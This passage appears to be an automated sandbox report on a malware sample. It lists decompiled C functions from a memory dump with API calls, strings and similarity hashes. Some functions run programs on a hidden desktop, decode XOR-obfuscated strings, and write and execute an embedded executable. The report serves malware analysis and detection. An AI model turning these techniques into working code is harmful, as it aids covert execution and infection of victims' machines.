DeleteObject.GDI32(00000000), ref: 00B4433B
DeleteDC.GDI32(00000000), ref: 00B44342

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreateDeleteObjectWindow$BitmapPrintRectSelect
String ID:
API String ID: 2993826089-0
Opcode ID: 0bca91cf8dc8a63e4ad6c1b83384bb5780dac5bf9bd0198d53fd64b8e18cf4c7
Instruction ID: c12e46b05e6a06514c8d6ccb915c0d5f6ba62856fba6076a017a772be475e387
Opcode Fuzzy Hash: 0bca91cf8dc8a63e4ad6c1b83384bb5780dac5bf9bd0198d53fd64b8e18cf4c7
Instruction Fuzzy Hash: BD110A72158205AF9341EF68DD88D6FBBECFB89258F40095DF585D3250CF68D9058BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00B54730, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00B54730(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t146;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr _t158;
				signed int _t161;
				signed int _t163;
				signed int _t164;
				intOrPtr _t166;
				signed int _t169;
				signed int _t170;
				signed int _t172;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t201;
				signed int _t204;
				void* _t209;
				intOrPtr* _t212;
				intOrPtr* _t213;
				signed int _t222;
				intOrPtr _t225;
				intOrPtr* _t226;
				signed int _t228;
				signed int* _t232;
				signed int _t233;
				void* _t238;
				void* _t240;
				signed int _t241;
				intOrPtr _t243;
				signed int _t249;
				signed int _t251;
				signed int _t254;
				signed int* _t255;
				intOrPtr* _t256;
				short _t257;
				signed int _t259;
				signed int _t261;
				void* _t263;
				void* _t265;

				_t259 = _t261;
				_t146 =  *0xb69014; // 0x26ce9e99
				_v8 = _t146 ^ _t259;
				_push(__ebx);
				_t204 = _a8;
				_push(__esi);
				_push(__edi);
				_t243 = _a4;
				_v736 = _t204;
				_v724 = E00B5830D(_t209, _t238) + 0x278;
				_t153 = E00B53E03(_t204, _t243, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t263 = _t261 - 0x2e4 + 0x18;
				if(_t153 == 0) {
					L39:
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t204 + 2; // 0x6
					_t249 = _t10 << 4;
					_t156 =  &_v272;
					_v716 = _t249;
					_t212 =  *((intOrPtr*)(_t249 + _t243));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t251 = _v716;
						if( *_t156 !=  *_t212) {
							break;
						}
						if( *_t156 == 0) {
							L6:
							_t157 = _v704;
						} else {
							_t257 =  *((intOrPtr*)(_t156 + 2));
							_v706 = _t257;
							_t251 = _v716;
							if(_t257 !=  *((intOrPtr*)(_t212 + 2))) {
								break;
							} else {
								_t156 = _t156 + 4;
								_t212 = _t212 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t157 != 0) {
							_t213 =  &_v272;
							_t240 = _t213 + 2;
							do {
								_t158 =  *_t213;
								_t213 = _t213 + 2;
								__eflags = _t158 - _v704;
							} while (_t158 != _v704);
							_v720 = (_t213 - _t240 >> 1) + 1;
							_t161 = E00B56F1C(4 + ((_t213 - _t240 >> 1) + 1) * 2);
							_v732 = _t161;
							__eflags = _t161;
							if(_t161 == 0) {
								goto L39;
							} else {
								_v728 =  *((intOrPtr*)(_t251 + _t243));
								_v740 =  *(_t243 + 0xa0 + _t204 * 4);
								_v744 =  *(_t243 + 8);
								_v708 = _t161 + 4;
								_t163 = E00B5604D(_t161 + 4, _v720,  &_v272);
								_t265 = _t263 + 0xc;
								__eflags = _t163;
								if(_t163 != 0) {
									_t164 = _v704;
									_push(_t164);
									_push(_t164);
									_push(_t164);
									_push(_t164);
									_push(_t164);
									E00B52919();
									asm("int3");
									_t166 =  *0xb6a53c; // 0x0
									return _t166;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t251 + _t243)) = _v708;
									if(_v272 != 0x43) {
										L17:
										_t169 = E00B53B10(_t204, _t243,  &_v700);
										_t222 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t222 = _v704;
											_t169 = _t222;
										}
									}
									 *(_t243 + 0xa0 + _t204 * 4) = _t169;
									__eflags = _t204 - 2;
									if(_t204 != 2) {
										__eflags = _t204 - 1;
										if(_t204 != 1) {
											__eflags = _t204 - 5;
											if(_t204 == 5) {
												 *((intOrPtr*)(_t243 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t243 + 0x10)) = _v712;
										}
									} else {
										_t255 = _v724;
										_t241 = _t222;
										_t232 = _t255;
										 *(_t243 + 8) = _v712;
										_v708 = _t255;
										_v720 = _t255[8];
										_v712 = _t255[9];
										while(1) {
											__eflags =  *(_t243 + 8) -  *_t232;
											if( *(_t243 + 8) ==  *_t232) {
												break;
											}
											_t256 = _v708;
											_t241 = _t241 + 1;
											_t201 =  *_t232;
											 *_t256 = _v720;
											_v712 = _t232[1];
											_t232 = _t256 + 8;
											 *((intOrPtr*)(_t256 + 4)) = _v712;
											_t204 = _v736;
											_t255 = _v724;
											_v720 = _t201;
											_v708 = _t232;
											__eflags = _t241 - 5;
											if(_t241 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t241 - 5;
											if(__eflags == 0) {
												_t192 = E00B5BFC9(_t204, _t243, _t255, __eflags, _v704, 1, 0xb34cd8, 0x7f,  &_v528,  *(_t243 + 8), 1);
												_t265 = _t265 + 0x1c;
												__eflags = _t192;
												if(_t192 == 0) {
													_t233 = _v704;
												} else {
													_t194 = _v704;
													do {
														 *(_t259 + _t194 * 2 - 0x20c) =  *(_t259 + _t194 * 2 - 0x20c) & 0x000001ff;
														_t194 = _t194 + 1;
														__eflags = _t194 - 0x7f;
													} while (_t194 < 0x7f);
													_t196 = L00B4E36D( &_v528,  *0xb690a0, 0xfe);
													_t265 = _t265 + 0xc;
													__eflags = _t196;
													_t233 = 0 | _t196 == 0x00000000;
												}
												_t255[1] = _t233;
												 *_t255 =  *(_t243 + 8);
											}
											 *(_t243 + 0x18) = _t255[1];
											goto L37;
										}
										__eflags = _t241;
										if(_t241 != 0) {
											 *_t255 =  *(_t255 + _t241 * 8);
											_t255[1] =  *(_t255 + 4 + _t241 * 8);
											 *(_t255 + _t241 * 8) = _v720;
											 *(_t255 + 4 + _t241 * 8) = _v712;
										}
										goto L25;
									}
									L37:
									_t170 = _t204 * 0xc;
									_t106 = _t170 + 0xb34d60; // 0xb469c7
									 *0xb672b4(_t243);
									_t172 =  *((intOrPtr*)( *_t106))();
									_t225 = _v728;
									__eflags = _t172;
									if(_t172 == 0) {
										__eflags = _t225 - 0xb693d8;
										if(_t225 != 0xb693d8) {
											_t254 = _t204 + _t204;
											__eflags = _t254;
											asm("lock xadd [eax], ecx");
											if(_t254 != 0) {
												goto L44;
											} else {
												E00B564B8( *((intOrPtr*)(_t243 + 0x28 + _t254 * 8)));
												E00B564B8( *((intOrPtr*)(_t243 + 0x24 + _t254 * 8)));
												E00B564B8( *(_t243 + 0xa0 + _t204 * 4));
												_t228 = _v704;
												 *(_v716 + _t243) = _t228;
												 *(_t243 + 0xa0 + _t204 * 4) = _t228;
											}
										}
										_t226 = _v732;
										 *_t226 = 1;
										 *((intOrPtr*)(_t243 + 0x28 + (_t204 + _t204) * 8)) = _t226;
									} else {
										 *((intOrPtr*)(_v716 + _t243)) = _t225;
										E00B564B8( *(_t243 + 0xa0 + _t204 * 4));
										 *(_t243 + 0xa0 + _t204 * 4) = _v740;
										E00B564B8(_v732);
										 *(_t243 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							L40:
							return E00B4AE43(_v8 ^ _t259);
						}
						goto L48;
					}
					asm("sbb eax, eax");
					_t157 = _t156 | 0x00000001;
					__eflags = _t157;
					goto L8;
				}
				L48:
			}

0x00b54733
0x00b5473b
0x00b54742
0x00b54745
0x00b54746
0x00b54749
0x00b5474d
0x00b5474e
0x00b54751
0x00b54761
0x00b54784
0x00b54789
0x00b5478e
0x00b54a66
0x00b54a66
0x00000000
0x00b54794
0x00b54794
0x00b54797
0x00b5479a
0x00b547a0
0x00b547a9
0x00b547ab
0x00b547ae
0x00b547b8
0x00b547be
0x00000000
0x00000000
0x00b547c4
0x00b547ed
0x00b547ed
0x00b547c6
0x00b547c6
0x00b547ce
0x00b547d5
0x00b547db
0x00000000
0x00b547dd
0x00b547dd
0x00b547e0
0x00b547eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00b547eb
0x00b547db
0x00b547fa
0x00b547fc
0x00b54805
0x00b5480b
0x00b5480e
0x00b5480e
0x00b54811
0x00b54814
0x00b54814
0x00b54824
0x00b54832
0x00b54837
0x00b5483e
0x00b54840
0x00000000
0x00b54846
0x00b5484c
0x00b54859
0x00b54862
0x00b54875
0x00b5487c
0x00b54881
0x00b54884
0x00b54886
0x00b54ae8
0x00b54aee
0x00b54aef
0x00b54af0
0x00b54af1
0x00b54af2
0x00b54af3
0x00b54af8
0x00b54af9
0x00b54aff
0x00b5488c
0x00b5488c
0x00b5489a
0x00b5489d
0x00b548b3
0x00b548ba
0x00b548c0
0x00b5489f
0x00b5489f
0x00b548a7
0x00000000
0x00b548a9
0x00b548a9
0x00b548af
0x00b548af
0x00b548a7
0x00b548c6
0x00b548cd
0x00b548d0
0x00b549f0
0x00b549f3
0x00b54a00
0x00b54a03
0x00b54a0b
0x00b54a0b
0x00b549f5
0x00b549fb
0x00b549fb
0x00b548d6
0x00b548d6
0x00b548dc
0x00b548e4
0x00b548e6
0x00b548e9
0x00b548f2
0x00b548fb
0x00b54901
0x00b54904
0x00b54906
0x00000000
0x00000000
0x00b54908
0x00b5490e
0x00b5490f
0x00b5491a
0x00b54922
0x00b5492a
0x00b5492d
0x00b54930
0x00b54936
0x00b5493c
0x00b54942
0x00b54948
0x00b5494b
0x00000000
0x00000000
0x00b5494d
0x00b54972
0x00b54972
0x00b54975
0x00b54992
0x00b54997
0x00b5499a
0x00b5499c
0x00b549da
0x00b5499e
0x00b5499e
0x00b549a4
0x00b549a9
0x00b549b1
0x00b549b2
0x00b549b2
0x00b549c9
0x00b549d0
0x00b549d3
0x00b549d5
0x00b549d5
0x00b549e0
0x00b549e6
0x00b549e6
0x00b549eb
0x00000000
0x00b549eb
0x00b5494f
0x00b54951
0x00b54956
0x00b5495c
0x00b54965
0x00b5496e
0x00b5496e
0x00000000
0x00b54951
0x00b54a0e
0x00b54a0e
0x00b54a12
0x00b54a1a
0x00b54a20
0x00b54a23
0x00b54a29
0x00b54a2b
0x00b54a79
0x00b54a7f
0x00b54a86
0x00b54a86
0x00b54a8c
0x00b54a90
0x00000000
0x00b54a92
0x00b54a96
0x00b54a9f
0x00b54aab
0x00b54ab9
0x00b54abf
0x00b54ac2
0x00b54ac2
0x00b54a90
0x00b54ad1
0x00b54ad9
0x00b54ae2
0x00b54a2d
0x00b54a33
0x00b54a3d
0x00b54a4f
0x00b54a56
0x00b54a63
0x00000000
0x00b54a63
0x00000000
0x00b54a2b
0x00b54886
0x00b547fe
0x00b54a68
0x00b54a78
0x00b54a78
0x00000000
0x00b547fc
0x00b547f5
0x00b547f7
0x00b547f7
0x00000000
0x00b547f7
0x00000000

APIs

Part of subcall function 00B5830D: GetLastError.KERNEL32(00000000,00000001,00000004,00B51A0E,00000001,00000000,00000002,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B58312
Part of subcall function 00B5830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B583B0

_free.LIBCMT ref: 00B54A3D
_free.LIBCMT ref: 00B54A56
_free.LIBCMT ref: 00B54A96
_free.LIBCMT ref: 00B54A9F
_free.LIBCMT ref: 00B54AAB

Strings

C, xrefs: 00B5488C

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: f5697e008b19ab47925d968f373726c9330fb87f24da726e778a837c72eb7fa7
Instruction ID: fa104f1072fdf4c64d425f1aef303d7c42c2c14784e46ede7e42649deaa89e9e
Opcode Fuzzy Hash: f5697e008b19ab47925d968f373726c9330fb87f24da726e778a837c72eb7fa7
Instruction Fuzzy Hash: D8B12875A012199FDB24DF18C885BAEB7F4FB48309F5045EAE909A7350D771AE94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00B4CAC0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00B4CAC0(void* __ebx, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v40;
				char _t58;
				signed int _t65;
				intOrPtr _t66;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr _t82;
				intOrPtr _t84;
				signed int _t88;
				char _t90;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t99;
				void* _t106;
				intOrPtr _t109;
				intOrPtr* _t111;
				intOrPtr _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;
				void* _t130;

				_t82 = _a8;
				_v5 = 0;
				_t114 = _t82 + 0x10;
				_push(_t114);
				_v16 = 1;
				_v20 = _t114;
				_v12 =  *(_t82 + 8) ^  *0xb69014;
				E00B4CA80( *(_t82 + 8) ^  *0xb69014);
				E00B4F487(_a12);
				_t58 = _a4;
				_t122 = _t121 + 0xc;
				_t109 =  *((intOrPtr*)(_t82 + 0xc));
				if(( *(_t58 + 4) & 0x00000066) != 0) {
					__eflags = _t109 - 0xfffffffe;
					if(_t109 != 0xfffffffe) {
						E00B4F470(_t82, 0xfffffffe, _t114, 0xb69014);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t58;
					_v28 = _a12;
					 *((intOrPtr*)(_t82 - 4)) =  &_v32;
					if(_t109 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t88 = _v12;
							_t20 = _t109 + 2; // 0x3
							_t65 = _t109 + _t20 * 2;
							_t84 =  *((intOrPtr*)(_t88 + _t65 * 4));
							_t66 = _t88 + _t65 * 4;
							_t89 =  *((intOrPtr*)(_t66 + 4));
							_v24 = _t66;
							if( *((intOrPtr*)(_t66 + 4)) == 0) {
								_t90 = _v5;
								goto L8;
							} else {
								_t67 = E00B4F420(_t89, _t114);
								_t90 = 1;
								_v5 = 1;
								_t130 = _t67;
								if(_t130 < 0) {
									_v16 = 0;
									L14:
									_push(_t114);
									E00B4CA80(_v12);
									goto L15;
								} else {
									if(_t130 > 0) {
										_t68 = _a4;
										__eflags =  *_t68 - 0xe06d7363;
										if( *_t68 == 0xe06d7363) {
											__eflags =  *0xb34370;
											if(__eflags != 0) {
												_t78 = E00B64D30(__eflags, 0xb34370);
												_t122 = _t122 + 4;
												__eflags = _t78;
												if(_t78 != 0) {
													_t118 =  *0xb34370; // 0xb4e178
													 *0xb672b4(_a4, 1);
													 *_t118();
													_t114 = _v20;
													_t122 = _t122 + 8;
												}
												_t68 = _a4;
											}
										}
										E00B4F454(_t68, _a8, _t68);
										_t70 = _a8;
										__eflags =  *((intOrPtr*)(_t70 + 0xc)) - _t109;
										if( *((intOrPtr*)(_t70 + 0xc)) != _t109) {
											E00B4F470(_t70, _t109, _t114, 0xb69014);
											_t70 = _a8;
										}
										_push(_t114);
										 *((intOrPtr*)(_t70 + 0xc)) = _t84;
										E00B4CA80(_v12);
										E00B4F438();
										asm("int3");
										_push(_t109);
										_t111 = _v40;
										__eflags =  *((char*)(_t111 + 4));
										if( *((char*)(_t111 + 4)) == 0) {
											L31:
											_t94 = _a4;
											_t72 =  *_t111;
											 *_t94 = _t72;
											 *((char*)(_t94 + 4)) = 0;
										} else {
											_t95 =  *_t111;
											__eflags = _t95;
											if(_t95 == 0) {
												goto L31;
											} else {
												_t106 = _t95 + 1;
												do {
													_t73 =  *_t95;
													_t95 = _t95 + 1;
													__eflags = _t73;
												} while (_t73 != 0);
												_push(_t84);
												_push(_t114);
												_t85 = _t95 - _t106 + 1;
												_push(_t95 - _t106 + 1);
												_t116 = E00B509A2();
												__eflags = _t116;
												if(_t116 != 0) {
													E00B56383(_t116, _t85,  *_t111);
													_t76 = _a4;
													_t99 = _t116;
													_t116 = 0;
													__eflags = 0;
													 *_t76 = _t99;
													 *((char*)(_t76 + 4)) = 1;
												}
												_t72 = E00B50985(_t116);
											}
										}
										return _t72;
									} else {
										goto L8;
									}
								}
							}
							goto L33;
							L8:
							_t109 = _t84;
						} while (_t84 != 0xfffffffe);
						if(_t90 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L33:
			}

0x00b4cac7
0x00b4cacc
0x00b4cad3
0x00b4cadc
0x00b4cade
0x00b4cae5
0x00b4cae8
0x00b4caeb
0x00b4caf3
0x00b4caf8
0x00b4cafb
0x00b4cafe
0x00b4cb05
0x00b4cb66
0x00b4cb69
0x00b4cb78
0x00000000
0x00b4cb78
0x00000000
0x00b4cb07
0x00b4cb07
0x00b4cb0d
0x00b4cb13
0x00b4cb19
0x00b4cb89
0x00b4cb92
0x00b4cb1b
0x00b4cb20
0x00b4cb20
0x00b4cb23
0x00b4cb26
0x00b4cb29
0x00b4cb2c
0x00b4cb2f
0x00b4cb32
0x00b4cb37
0x00b4cb4d
0x00000000
0x00b4cb39
0x00b4cb3b
0x00b4cb40
0x00b4cb42
0x00b4cb45
0x00b4cb47
0x00b4cb5d
0x00b4cb7d
0x00b4cb7d
0x00b4cb81
0x00000000
0x00b4cb49
0x00b4cb49
0x00b4cb93
0x00b4cb96
0x00b4cb9c
0x00b4cb9e
0x00b4cba5
0x00b4cbac
0x00b4cbb1
0x00b4cbb4
0x00b4cbb6
0x00b4cbb8
0x00b4cbc5
0x00b4cbcb
0x00b4cbcd
0x00b4cbd0
0x00b4cbd0
0x00b4cbd3
0x00b4cbd3
0x00b4cba5
0x00b4cbdb
0x00b4cbe0
0x00b4cbe3
0x00b4cbe6
0x00b4cbf2
0x00b4cbf7
0x00b4cbf7
0x00b4cbfa
0x00b4cbfe
0x00b4cc01
0x00b4cc11
0x00b4cc16
0x00b4cc1a
0x00b4cc1b
0x00b4cc1e
0x00b4cc22
0x00b4cc6c
0x00b4cc6c
0x00b4cc6f
0x00b4cc71
0x00b4cc73
0x00b4cc24
0x00b4cc24
0x00b4cc26
0x00b4cc28
0x00000000
0x00b4cc2a
0x00b4cc2a
0x00b4cc2d
0x00b4cc2d
0x00b4cc2f
0x00b4cc30
0x00b4cc30
0x00b4cc36
0x00b4cc37
0x00b4cc38
0x00b4cc3b
0x00b4cc41
0x00b4cc44
0x00b4cc46
0x00b4cc4c
0x00b4cc51
0x00b4cc54
0x00b4cc59
0x00b4cc59
0x00b4cc5b
0x00b4cc5d
0x00b4cc5d
0x00b4cc62
0x00b4cc69
0x00b4cc28
0x00b4cc79
0x00b4cb4b
0x00000000
0x00b4cb4b
0x00b4cb49
0x00b4cb47
0x00000000
0x00b4cb50
0x00b4cb50
0x00b4cb52
0x00b4cb59
0x00000000
0x00b4cb5b
0x00000000
0x00b4cb59
0x00b4cb19
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00B4CAEB
___except_validate_context_record.LIBVCRUNTIME ref: 00B4CAF3
_ValidateLocalCookies.LIBCMT ref: 00B4CB81
__IsNonwritableInCurrentImage.LIBCMT ref: 00B4CBAC
_ValidateLocalCookies.LIBCMT ref: 00B4CC01

Strings

csm, xrefs: 00B4CB96

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bf822cc15369b8dd0931a291cbef86222044b84ae5eca852f554f8b6644dde8f
Instruction ID: e348d12dbf0859ffc891c2815bd541491ebf208a787c15dabb0d6b7ffa7ac6ee
Opcode Fuzzy Hash: bf822cc15369b8dd0931a291cbef86222044b84ae5eca852f554f8b6644dde8f
Instruction Fuzzy Hash: 9D41A134A0120DABCF10DF68C885AAEBFF4EF45728F1481E5E8155B392DB359B01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B45A71, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00B45A71(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v10;
				short _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v100;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v156;
				CHAR* _v160;
				struct _PROCESS_INFORMATION* _v176;
				struct HINSTANCE__* _v180;
				struct tagOFNA _v188;
				signed int _t28;
				CHAR* _t31;
				struct HINSTANCE__* _t34;
				CHAR* _t51;
				struct tagOFNA _t56;
				long _t58;
				CHAR* _t61;
				signed int _t63;
				signed int _t65;
				signed int _t66;

				_t65 = (_t63 & 0xfffffff8) - 0xbc;
				_t28 =  *0xb69014; // 0x26ce9e99
				_v8 = _t28 ^ _t65;
				SetThreadDesktop( *0xb6ae3c);
				_push(0x105);
				_t31 = E00B509A2();
				_t56 = 0x58;
				_t61 = _t31;
				E00B4D0F0(_t56,  &_v188, 0, _t56);
				_t66 = _t65 + 0x10;
				_v188 = _t56;
				_t34 = GetModuleHandleA(0);
				asm("movaps xmm0, [0xb3de40]");
				_t51 = 0;
				_v180 = _t34;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x50;
				do {
					_t6 = _t51 + 0x40; // 0x40
					 *(_t66 + _t51 + 0xb0) =  *(_t66 + _t51 + 0xb0) ^ _t6;
					_t51 = _t51 + 1;
				} while (_t51 < 0x11);
				asm("movaps xmm0, [0xb3de10]");
				_v176 =  &_v28;
				_v160 = _t61;
				_v156 = 0x104;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x3f25;
				_v10 = 0;
				_v140 = E00B427A4( &_v28);
				_v136 = 0x1000;
				if(GetOpenFileNameA( &_v188) != 0) {
					_t58 = 0x44;
					E00B4D0F0(_t58,  &_v100, 0, _t58);
					_v100.cb = _t58;
					_v100.lpDesktop = 0xb699c0;
					asm("stosd");
					_t66 = _t66 + 0xc;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					CreateProcessA(_t61, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
				}
				return E00B4AE43(_v8 ^ _t66);
			}

0x00b45a77
0x00b45a7d
0x00b45a84
0x00b45a94
0x00b45a9a
0x00b45a9f
0x00b45aa6
0x00b45aa8
0x00b45ab2
0x00b45ab7
0x00b45aba
0x00b45abf
0x00b45ac5
0x00b45acc
0x00b45ace
0x00b45ad2
0x00b45ada
0x00b45ae4
0x00b45ae4
0x00b45ae7
0x00b45aee
0x00b45aef
0x00b45af4
0x00b45b09
0x00b45b0d
0x00b45b11
0x00b45b19
0x00b45b21
0x00b45b2b
0x00b45b37
0x00b45b40
0x00b45b50
0x00b45b54
0x00b45b5c
0x00b45b61
0x00b45b6e
0x00b45b76
0x00b45b77
0x00b45b7a
0x00b45b7b
0x00b45b7c
0x00b45b92
0x00b45b92
0x00b45bae

APIs

SetThreadDesktop.USER32 ref: 00B45A94
GetModuleHandleA.KERNEL32(00000000), ref: 00B45ABF
GetOpenFileNameA.COMDLG32(?), ref: 00B45B48
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B45B92

Strings

Tett, xrefs: 00B45B6E
%?, xrefs: 00B45B21

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDesktopFileHandleModuleNameOpenProcessThread
String ID: %?$Tett
API String ID: 633583800-3620498704
Opcode ID: 5e55183e8bae8a10db9b1aadf87528156944cf214102cbff47ecbe28663384f1
Instruction ID: 7e8d98812590f1cb531091cc388b8539e726b34cd9be216709fd4f7a3f44e849
Opcode Fuzzy Hash: 5e55183e8bae8a10db9b1aadf87528156944cf214102cbff47ecbe28663384f1
Instruction Fuzzy Hash: 54315C725087849BE320DF68D845B9BBBE9FF98304F000A2EE69487161EB709548CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00B48CE5, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B48CE5(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				short _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				void* __ebp;
				signed int _t23;
				char* _t26;
				char* _t30;
				char* _t33;
				signed int _t56;
				void* _t59;

				_t43 = __ecx;
				_t23 =  *0xb69014; // 0x26ce9e99
				_v8 = _t23 ^ _t56;
				_t55 = __edx;
				_t59 = __ecx;
				if(_t59 == 0) {
					_t26 = E00B489B2(__ebx, __edx, __edi, __edx, _t56, __edx,  &_v32);
					if(_v32 > 0x400 &&  *_t26 == 0x4d &&  *((char*)(_t26 + 1)) == 0x5a) {
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						E00B48B64(E00B42D10( &_v24), _t26, _v32);
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						_v32 = 0x2d27312f;
						_v28 = 0;
						_t30 = E00B42D10( &_v24);
						_t21 =  &_v32; // 0x2d27312f
						ShellExecuteA(0, E00B432BE(_t21), _t30, 0, 0, 0);
					}
				} else {
					if(_t59 > 0) {
						if(__ecx <= 2) {
							_t33 = StrChrA(__edx, 0x3a);
							if(_t33 != 0) {
								 *_t33 = 0;
								E00B46268(_t55, E00B525D7(_t43,  &(_t33[1]), 0, 0xa));
							}
						} else {
							if(__ecx == 4) {
								_v24 = 0x6160007;
								_v20 = 0x1403081b;
								_v16 = 0xe0d081b;
								_v12 = 0;
								MessageBoxA(0, _t55, E00B42810( &_v24), 0);
							}
						}
					}
				}
				return E00B4AE43(_v8 ^ _t56);
			}

0x00b48ce5
0x00b48ceb
0x00b48cf2
0x00b48cf7
0x00b48cf9
0x00b48cfb
0x00b48d77
0x00b48d83
0x00b48d96
0x00b48d9e
0x00b48da7
0x00b48db3
0x00b48dbe
0x00b48dc5
0x00b48dcc
0x00b48dd2
0x00b48dd9
0x00b48ddc
0x00b48de2
0x00b48dec
0x00b48dec
0x00b48cfd
0x00b48cfd
0x00b48d06
0x00b48d45
0x00b48d4d
0x00b48d57
0x00b48d68
0x00b48d68
0x00b48d08
0x00b48d0b
0x00b48d13
0x00b48d1e
0x00b48d25
0x00b48d2c
0x00b48d37
0x00b48d37
0x00b48d0b
0x00b48d06
0x00b48cfd
0x00b48dff

APIs

MessageBoxA.USER32 ref: 00B48D37
StrChrA.SHLWAPI(?,0000003A), ref: 00B48D45
ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B48DEC

Strings

(k#?, xrefs: 00B48DC5
-, xrefs: 00B48DCC
/1'-, xrefs: 00B48D90

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMessageShell
